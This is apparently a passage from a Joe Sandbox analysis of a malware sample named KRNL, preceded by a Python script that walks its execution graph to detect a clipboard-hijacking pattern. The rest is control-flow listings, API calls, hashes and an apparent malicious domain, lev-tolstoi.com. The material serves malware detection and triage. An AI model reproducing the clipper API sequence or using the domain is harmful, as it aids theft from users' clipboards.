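The execution_graph dump above is the text behind the rendered graph, and it is hard to read by eye, but it already carries the API sequences a triager wants: for example the node cluster at 58a1000 opens the clipboard, reads it, allocates a buffer, then calls EmptyClipboard and SetClipboardData, which is the read-then-replace pattern of a clipper. The following is an added example, not part of the Joe Sandbox report or its tooling, that parses that text form and walks it for such a chain. The token layout it assumes (a decimal node id, a hex address, optional API names, and `a->b` edges) is inferred from this dump and is an assumption, not a documented format; the sample input is the clipboard subgraph excerpted from the dump above.

```python
"""Parse the text form of a Joe Sandbox execution_graph dump and search it for
API call chains. Added example; the token format (decimal node id, hex address,
optional API names, 'a->b' edges) is inferred from the dump in this report and
is an assumption, not a documented Joe Sandbox format."""
from collections import deque

# Constructed sample: the clipboard subgraph excerpted from the execution_graph
# dump above (node 33992 at 58a1000). Line breaks are irrelevant to the parser.
SAMPLE = """
33992 58a1000 33993 58a1102 33992->33993 33994 58a1012 33992->33994
33995 58a103a OpenClipboard 33994->33995 33996 58a1030 Sleep 33994->33996
33997 58a104a GetClipboardData 33995->33997
33998 58a10f9 GetClipboardSequenceNumber 33995->33998 33996->33994
33999 58a105a GlobalLock 33997->33999 34000 58a10f3 CloseClipboard 33997->34000
33998->33994 33999->34000 34001 58a106b GlobalAlloc 33999->34001 34000->33998
34003 58a10e9 GlobalUnlock 34001->34003 34004 58a109d GlobalLock 34001->34004
34003->34000 34005 58a10b0 34004->34005 34006 58a10b9 GlobalUnlock 34005->34006
34007 58a10cb EmptyClipboard SetClipboardData 34006->34007
34008 58a10e0 GlobalFree 34006->34008 34007->34003 34007->34008 34008->34003
"""


def _is_hex(tok):
    return tok != "" and all(c in "0123456789abcdef" for c in tok.lower())


def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> (address, [api names]),
    edges maps id -> [successor ids] in order of appearance."""
    tokens = text.replace("execution_graph", " ").split()
    nodes, edges = {}, {}
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                       # edge between two node ids
            src, dst = tok.split("->", 1)
            edges.setdefault(src, []).append(dst)
            i += 1
            continue
        # a decimal id followed by a hex address starts a new node
        if tok.isdigit() and i + 1 < len(tokens) and _is_hex(tokens[i + 1]):
            current = tok
            nodes[current] = (tokens[i + 1], [])
            i += 2
            continue
        if current is not None:               # anything else is an API name
            nodes[current][1].append(tok)
        i += 1
    return nodes, edges


def nodes_calling(nodes, api):
    """Addresses of every node whose block calls the given API."""
    return sorted(addr for addr, apis in nodes.values() if api in apis)


def api_chain(nodes, edges, start_api, end_api):
    """APIs seen along the shortest path (BFS) from a node calling start_api to
    a node calling end_api, or None when no such path exists."""
    best = None
    for start, (_, apis) in nodes.items():
        if start_api not in apis:
            continue
        prev, queue = {start: None}, deque([start])
        while queue:
            n = queue.popleft()
            if end_api in nodes.get(n, ("", []))[1]:
                path = []
                while n is not None:
                    path.append(n)
                    n = prev[n]
                path.reverse()
                if best is None or len(path) < len(best):
                    best = path
                break
            for nxt in edges.get(n, []):
                if nxt not in prev:
                    prev[nxt] = n
                    queue.append(nxt)
    if best is None:
        return None
    return [a for p in best for a in nodes.get(p, ("", []))[1]]


def detects_clipboard_hijack(text):
    """True when the graph reaches SetClipboardData from OpenClipboard after
    reading the clipboard and emptying it: the replace-contents pattern."""
    nodes, edges = parse_execution_graph(text)
    chain = api_chain(nodes, edges, "OpenClipboard", "SetClipboardData")
    return (chain is not None and "GetClipboardData" in chain
            and "EmptyClipboard" in chain)


if __name__ == "__main__":
    n, e = parse_execution_graph(SAMPLE)
    print(api_chain(n, e, "OpenClipboard", "SetClipboardData"))
    print("clipper pattern:", detects_clipboard_hijack(SAMPLE))
```

Run over the full execution_graph text (paste it into `SAMPLE` or read it from a file), the same walk also surfaces the other chains visible in the dump, such as the CoCreateInstance / SysAllocString / CoSetProxyBlanket cluster at 437d50 that precedes the WMI queries the report flags.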

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 0 423675-42367f 1 4236d0 0->1 2 423a01-423a9a 0->2 3 423686-42368a 0->3 4 4239f7-423a00 0->4 5 4236c4-4236cf call 407fa0 0->5 6 423825-423836 0->6 7 4236d8-4236df 0->7 8 4239c9 0->8 9 4239b9-4239c1 0->9 10 4236be 0->10 11 42383d-42384a 0->11 1->7 12 423aa0-423ab8 2->12 18 423693 3->18 19 42368c-423691 3->19 5->1 6->2 6->8 6->9 6->11 15 423ad4-423ae8 6->15 16 423c1b 6->16 17 4239cf-4239db call 407fa0 6->17 13 4236e1-4236e6 7->13 14 4236e8 7->14 9->8 10->5 20 423853 11->20 21 42384c-423851 11->21 12->12 25 423aba-423ac4 call 421570 12->25 23 4236ef-42372a call 407f90 13->23 14->23 28 423af0-423b34 15->28 43 4239e4 17->43 26 423696-4236b7 call 407f90 RtlExpandEnvironmentStrings 18->26 19->26 27 42385a-4238f2 call 407f90 20->27 21->27 41 423730-42379d 23->41 37 423ac9-423acc 25->37 26->1 26->2 26->4 26->5 26->6 26->7 26->8 26->9 26->10 26->11 42 423900-42392d 27->42 28->28 35 423b36-423ba9 28->35 40 423bb0-423bf5 35->40 37->15 40->40 44 423bf7-423c12 call 421190 40->44 41->41 45 42379f-4237ab 41->45 42->42 46 42392f-423938 42->46 52 4239ea-4239f4 call 407fa0 43->52 44->16 48 4237d1-4237e2 45->48 49 4237ad-4237b3 45->49 50 423961-42396c 46->50 51 42393a-423942 46->51 55 423803 48->55 56 4237e4-4237ea 48->56 54 4237c0-4237cf 49->54 59 423991-4239b2 GetLogicalDrives call 440250 50->59 60 42396e-423971 50->60 58 423950-42395f 51->58 52->4 54->48 54->54 61 423806-423811 call 440250 55->61 64 4237f0-4237ff 56->64 58->50 58->58 59->4 59->8 59->9 59->15 59->16 59->17 59->43 59->52 70 423d72-423d78 59->70 71 423c21-423c2d call 407fa0 59->71 62 423980-42398f 60->62 69 423816-42381e 61->69 62->59 62->62 64->64 67 423801 64->67 67->61 69->2 69->6 69->8 69->9 69->11 69->15 69->17 73 423d81 70->73 74 423d7a-423d7f 
70->74 71->70 75 423d84-423da4 call 407f90 RtlExpandEnvironmentStrings 73->75 74->75 79 423ff0-423ff2 75->79 80 424070-42407d 75->80 81 423ea6-423eb0 75->81 82 423ff7-424014 75->82 83 423db5-423def 75->83 84 423fc5-423fe9 call 43f450 75->84 85 423dab-423dad 75->85 86 42401b-42402d 75->86 87 423e99-423ea4 call 407fa0 75->87 89 4256bf-4256c8 79->89 92 424084-4240ae call 407f90 call 43f150 80->92 93 42407f 80->93 82->80 82->86 91 423df0-423e33 83->91 84->79 84->80 84->82 84->86 85->83 86->70 86->79 86->80 86->81 86->82 86->83 86->84 86->85 86->86 86->87 90 424060-424069 86->90 87->81 90->80 90->86 91->91 97 423e35-423e91 call 41f430 91->97 104 4240e3 92->104 105 4240c0-4240cf call 43f040 92->105 106 4240f0-42428f 92->106 107 4240b5 92->107 93->92 97->87 104->106 110 4240d4-4240dc 105->110 109 424290-4242ba 106->109 107->105 109->109 111 4242bc-424535 109->111 110->104 110->106 112 424540-424571 111->112 112->112 113 424573-42473b 112->113 114 424740-42476c 113->114 114->114 115 42476e-42493f 114->115 116 424940-424969 115->116 116->116 117 42496b-424b3f 116->117 118 424b40-424b70 117->118 118->118 119 424b72-424be0 118->119 119->89
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 004236A9
                                                                                                                                                                                                                                                          • GetLogicalDrives.KERNEL32 ref: 00423996
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: DrivesEnvironmentExpandLogicalStrings
                                                                                                                                                                                                                                                          • String ID: 9$&Kt0$)mOm$45$<$>>$AQ$Hmkm$PR$Vq$Vq$XH$Ys$\\$_p$bmdm$bo$ef$fmkm$mm$pmrm$rl$wY$|i$|s$\a
                                                                                                                                                                                                                                                          • API String ID: 1595903574-2236109924
                                                                                                                                                                                                                                                          • Opcode ID: bdc2e361060c2e60b1b8bcc2cdb8b3bfd283e30f55f17195bd23cc72b47b61d2
                                                                                                                                                                                                                                                          • Instruction ID: 2fc2160d72e1542a336960e5481f9d0735e9c35b6a9b6e11306a6587d30006f6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdc2e361060c2e60b1b8bcc2cdb8b3bfd283e30f55f17195bd23cc72b47b61d2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25A2B7B9D11229DBDB20DF18DC8529EBB71FF95304F1086E9C8596B350E7389A81CF86

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 120 40cc75-40cc9a call 408630 123 40cca0-40cd04 120->123 123->123 124 40cd06-40cd6f 123->124 125 40cd70-40cd9c 124->125 125->125 126 40cd9e-40cdaf 125->126 127 40cdb1-40cdb8 126->127 128 40cdcb-40cdd7 126->128 129 40cdc0-40cdc9 127->129 130 40cdd9-40cdda 128->130 131 40cdeb-40cdf8 128->131 129->128 129->129 132 40cde0-40cde9 130->132 133 40cdfa-40ce01 131->133 134 40ce1b-40ce23 131->134 132->131 132->132 137 40ce10-40ce19 133->137 135 40ce25-40ce26 134->135 136 40ce3b-40cf53 134->136 138 40ce30-40ce39 135->138 139 40cf60-40cf80 136->139 137->134 137->137 138->136 138->138 139->139 140 40cf82-40cfaf 139->140 141 40cfb0-40cfd6 140->141 141->141 142 40cfd8-40d008 call 40b640 141->142 144 40d00d-40d037 142->144
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0h+h$<h7h$ChYh$Ehph$FhFh$HhPh$Kh^h$RhTh$Rhvh$Xh h$^hYh$`h,h$ehdh$fhch$hh(h$lev-tolstoi.com$ohuh$ph8h$shoh$uheh$uhjh$vh}h$xhdh$yhrh
• API String ID: 0-3555453935
• Opcode ID: 6a9fbf59f452024c383559b785281fa2e80acd9a431c8eb1751f95ce11aa3c8a
• Instruction ID: 8753c489787e8cef6e0b2d778e15f4088c0b1d051e6c25f020ec618a161c42f3
• Opcode Fuzzy Hash: 6a9fbf59f452024c383559b785281fa2e80acd9a431c8eb1751f95ce11aa3c8a
• Instruction Fuzzy Hash: 3C81F1B190D3D08AD7308F29D98979BBBE1EFC6300F554A6DC1C86B250EB7A0516CB96

Control-flow Graph

• Executed
• Not Executed
APIs
• CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00437E10
• SysAllocString.OLEAUT32([d), ref: 00437E93
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437ED1
• SysAllocString.OLEAUT32(!,.,), ref: 00437F2F
• SysAllocString.OLEAUT32(B6ABB756), ref: 00437FEF
• VariantInit.OLEAUT32(?), ref: 0043805E
• VariantClear.OLEAUT32(?), ref: 004381B1
• SysFreeString.OLEAUT32 ref: 004381D4
• SysFreeString.OLEAUT32(?), ref: 004381DA
• SysFreeString.OLEAUT32(00000000), ref: 004381EE
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
• String ID: ,,Y,$C$W;$[d$\
• API String ID: 2485776651-2867424240
• Opcode ID: 44b9128bec2104e14614ee01767a834835cc461376388db997f909470237cd48
• Instruction ID: 3d09bc75159cb0bc0addfeff3c9f402bb7feac1769e375c6bd2c7d3d39127c8e
• Opcode Fuzzy Hash: 44b9128bec2104e14614ee01767a834835cc461376388db997f909470237cd48
• Instruction Fuzzy Hash: CD02BA766083009FE710DF65C884B6BBBE5EFC9710F14882EF5959B3A0DB79E8018B56

Control-flow Graph

APIs
• Sleep.KERNELBASE(00000001), ref: 058A1032
• OpenClipboard.USER32(00000000), ref: 058A103C
• GetClipboardData.USER32(0000000D), ref: 058A104C
• GlobalLock.KERNEL32(00000000), ref: 058A105D
• GlobalAlloc.KERNEL32(00000002,-00000004), ref: 058A1090
• GlobalLock.KERNEL32 ref: 058A10A0
• GlobalUnlock.KERNEL32 ref: 058A10C1
• EmptyClipboard.USER32 ref: 058A10CB
• SetClipboardData.USER32(0000000D), ref: 058A10D6
• GlobalFree.KERNEL32 ref: 058A10E3
• GlobalUnlock.KERNEL32(?), ref: 058A10ED
• CloseClipboard.USER32 ref: 058A10F3
• GetClipboardSequenceNumber.USER32 ref: 058A10F9
Memory Dump Source
• Source File: 00000002.00000002.2916221258.00000000058A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: true
• Associated: 00000002.00000002.2916206230.00000000058A0000.00000002.00000800.00020000.00000000.sdmp
• Associated: 00000002.00000002.2916236023.00000000058A2000.00000002.00000800.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_58a0000_KRNL.jbxd
Similarity
• API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
• String ID:
• API String ID: 1416286485-0
• Opcode ID: d8020062fc07a51c21c6fc66c8fdec1c339669c5555f250f16fb657dfd1376b3
• Instruction ID: 1829eb1541578f15eba19ce2534b06e6051a366bf1a8796bd0e513d3115946c5
• Opcode Fuzzy Hash: d8020062fc07a51c21c6fc66c8fdec1c339669c5555f250f16fb657dfd1376b3
• Instruction Fuzzy Hash: 4221833A614250ABF7302B75AC0EB6A7BA9FF05786F040438FD47D6160EF61AC10C7A1

Control-flow Graph

• Executed
• Not Executed
APIs
• RtlExpandEnvironmentStrings.NTDLL ref: 004104C9
• RtlExpandEnvironmentStrings.NTDLL ref: 004105C0
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: EnvironmentExpandStrings
• String ID: $$<.$X@$f@$i
• API String ID: 237503144-92190101
• Opcode ID: 173b7ab53e4ef546a75e85442e8143dd99584801225795e8cb45284878ed8cf0
• Instruction ID: 5d4d46c9a90ffb503717a27f7093fefa0dd82dfd25ea639eba7b9214d4ffac56
• Opcode Fuzzy Hash: 173b7ab53e4ef546a75e85442e8143dd99584801225795e8cb45284878ed8cf0
• Instruction Fuzzy Hash: 96528472A1C7508BC3649F39C4813EEB7E1AF85320F154A2EE8E9973D1D67899818B47
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID:
• String ID: &8$`
• API String ID: 0-842996520
• Opcode ID: 04d55245a6d6fe8c9061ae8d234f7c10597bb42f531ccff2a359901277746420
• Instruction ID: e733c91b1712801f5584cc40fcd09b41f9830b0468eb1d5c922baaacae7725df
• Opcode Fuzzy Hash: 04d55245a6d6fe8c9061ae8d234f7c10597bb42f531ccff2a359901277746420
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0213D3B6D042148BDB14DF78C9413DEBBF1AF45310F1586AED859AB391E7388D81CB8A

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1085 43328c-43336d call 413cd0 GetSystemMetrics * 2 1093 433374-433405 1085->1093
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-3916222277
• Opcode ID: be52f64dafac1e5ff9b8b3963e09f4bf9d8351297948cd5fcb18972580f21498
• Instruction ID: d4d7d992982323047ebfbe64a21f998e07ffa76df3b32112bcb1f2418617eae3
• Opcode Fuzzy Hash: be52f64dafac1e5ff9b8b3963e09f4bf9d8351297948cd5fcb18972580f21498
• Instruction Fuzzy Hash: CB51A3B4E142089FCB40EFACD985A9EBBF0BF48310F10852AE498E7350D774A945CF96

Control-flow Graph

• Executed
• Not Executed
control_flow_graph (function starting at 426520; the node and edge listing of the rendered graph image is not reproduced here)
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: X`X*$l'Y9${$[7
• API String ID: 2994545307-1509796914
• Opcode ID: a7d4199a11afbcf664926020d9bbf2455d7265343a18d6926ad5fef2716d1da4
• Instruction ID: 627f6c153a1e7a7093b5324472515697c41291643dc6d7d1fda9c09fef2ffd72
• Opcode Fuzzy Hash: a7d4199a11afbcf664926020d9bbf2455d7265343a18d6926ad5fef2716d1da4
• Instruction Fuzzy Hash: A5B15A72B043609BEB14CF14E84176B73A2EFD5304F96843EE8459B391E639EC09C389

Control-flow Graph

• Executed
• Not Executed
control_flow_graph (function starting at 40a8b0; the node and edge listing of the rendered graph image is not reproduced here)
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID:
• String ID: F>]>$j>a>$ok
• API String ID: 0-2883800044
• Opcode ID: 9129864f14639d17449b2f603e3219f21eae55219ba341b137a72b1f0aae79bb
• Instruction ID: dd8b5e7c3122165f2fea48d4b4d2b9f00cb897ce1b6d78e13b6b522b53c881e4
• Opcode Fuzzy Hash: 9129864f14639d17449b2f603e3219f21eae55219ba341b137a72b1f0aae79bb
• Instruction Fuzzy Hash: 76B1F17261C3118BD328DF14845156FBBF2EFD1304F16482DEAD5AB380D239A91ACB9B
APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CF80
Strings
Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID: 8a
• API String ID: 3960555810-1827930058
• Opcode ID: 81e50134e1fb4b6584dfc42dfbfb872d721f9fd4204c3a06ee038d379535b189
• Instruction ID: fc3ee4ebcf7795b95269f936594514899a52a37c83a41ea56dd400e4873d1426
• Opcode Fuzzy Hash: 81e50134e1fb4b6584dfc42dfbfb872d721f9fd4204c3a06ee038d379535b189
• Instruction Fuzzy Hash: 14B1F37160C3918BD729CF2AD85136BFBE1AFD6304F58886EE0D6873A1D7398405CB56
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: 9.$9.
APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042CF80
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID:
Strings
Similarity
• API ID: InitializeThunk
• String ID: mLjL
APIs
• LdrInitializeThunk.NTDLL(00423382,00000002,00000014,000000FF,00000000,?,00000002,?), ref: 0043CD4E
Similarity
• API ID: InitializeThunk
• String ID:
Strings
Similarity
• API ID:
• String ID: G9
Strings
Similarity
• API ID: InitializeThunk
• String ID: @
Strings
Similarity
• API ID: InitializeThunk
• String ID: @
                                                                                                                                                                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                          • Opcode ID: 3511ef42c4b007baf1fec548fa9812ccd487ed6d294edc1ac7bf06dcc82e3f6b
                                                                                                                                                                                                                                                          • Instruction ID: 96e49273ea620ae155524270832f03a61cff14ce2c4030ad9a9b34360ce12f08
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3511ef42c4b007baf1fec548fa9812ccd487ed6d294edc1ac7bf06dcc82e3f6b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA4123B0A083109FD718CF24D95073BB6E2EFC9705F14A52EE481A7394E7399C05C79A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                          • Opcode ID: 9191ed74d0d8586d4a373cf941998efa4049e7a180d54467ad32adb286ee0df7
                                                                                                                                                                                                                                                          • Instruction ID: 2a5c568ff03cc436ede057be6d62a120ad0484157719e54bd9382df1f9979818
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9191ed74d0d8586d4a373cf941998efa4049e7a180d54467ad32adb286ee0df7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4021EEB94093049BC710CF18E88066BB7F5FFC9320F15693DE58897360E376A848C75A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: |X|X
                                                                                                                                                                                                                                                          • API String ID: 0-2218283020
                                                                                                                                                                                                                                                          • Opcode ID: ce84bb1b908e3da7b10efdad8a51853dd17b9261ed57cfd3814ffec2b1657eb9
                                                                                                                                                                                                                                                          • Instruction ID: 13b12417835161548989760e477e4b9bf18457aaa1a030ea2397493de378e4bd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce84bb1b908e3da7b10efdad8a51853dd17b9261ed57cfd3814ffec2b1657eb9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D21A2BAE406228BC725CF58CC95BAAF7B0FF49700F024228ED49BB750D635AC4287D4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 88498985efd4b3ba56db0083681181ecdc59f8f7a8d40373a67364ad67f09b48
                                                                                                                                                                                                                                                          • Instruction ID: bda42ee7fe58aa78db34f1b728a56894abae76de33374c7402216ab42dc0119f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88498985efd4b3ba56db0083681181ecdc59f8f7a8d40373a67364ad67f09b48
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29812636A042119BCB249F18CC40AAFB3A2FFD8710F15A53DED859B364EB34AC158385
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 1512670e2730101e1da27ba101819542289284cb3c28dd2e5113689dce48cd15
                                                                                                                                                                                                                                                          • Instruction ID: e6a55991c61f36b3aa79f998637d078abe9e386279f295a7a094abe81f2018d2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1512670e2730101e1da27ba101819542289284cb3c28dd2e5113689dce48cd15
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97513735A083149BE720EF25C84476BB3A2FFD9700F15953EDA849B361E7756C1187C9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 963b01d9d9c5355ea5fc2f8ae16c758e2793185ce3c7b00e16d00e46dcfaf915
                                                                                                                                                                                                                                                          • Instruction ID: f6c1554600131ee17df06160cbc0b7981c093ccfdab986da07a7a73cd69f7880
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 963b01d9d9c5355ea5fc2f8ae16c758e2793185ce3c7b00e16d00e46dcfaf915
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81415121B542778BEB148A249C623B7F791EB66380F9C827BD85587381E31CDC16E3D6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
